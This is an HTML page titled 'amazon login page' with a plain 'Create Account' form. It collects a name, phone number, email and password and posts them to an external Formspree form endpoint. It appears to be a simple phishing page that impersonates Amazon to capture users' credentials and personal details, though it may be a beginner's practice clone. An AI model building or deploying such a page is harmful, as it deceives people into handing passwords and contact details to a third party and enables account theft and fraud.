<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>amazon login page</title>
</head>
<body>
    
    <form style="border: 1px solid black;border-radius: 10px; width: 500px;margin: 50px;margin-left: 400px;height: 400px;background-color: rgba(233, 233, 84, 0.87);"action="https://formspree.io/f/xrgjebla" method="POST">
        <div style="margin-left: 100px;margin-bottom: 30px;">
            <h1> Create Account</h1>
        <div style="font-family: 'Segoe UI';margin-bottom: 5px;">Your Name</div>
        <input type="text" name="n1" value="" maxlength="35">
        
        <div style="margin-top: 10px;margin-bottom: 10px;font-family: 'Segoe UI';">Contact Number </div>
        
        <input type="number" name="n1" value="91" style="width: 45px;"  >
         <input type="text" name="n1" value="" maxlength="10">

         <div style="margin-bottom: 10px ;margin-top: 10px;font-family: segoe UI;">Email (Optional)</div>
         <input type="text" name="n1" value="" style="width: 300px">
         <div style="font-family: 'Segoe UI'; margin-top: 10px;margin-bottom: 10px;">Password</div>
         <input type="password" name="n1" value="" maxlength="6">
         <h3 style="font-size: 9px; font-style: italic;font-family: segoe UI;">(i) Your Password Must Be Of 6 Characters</h3>
         <br>
         <input type="submit">

        </div>

    </form>
    
</body>
</html>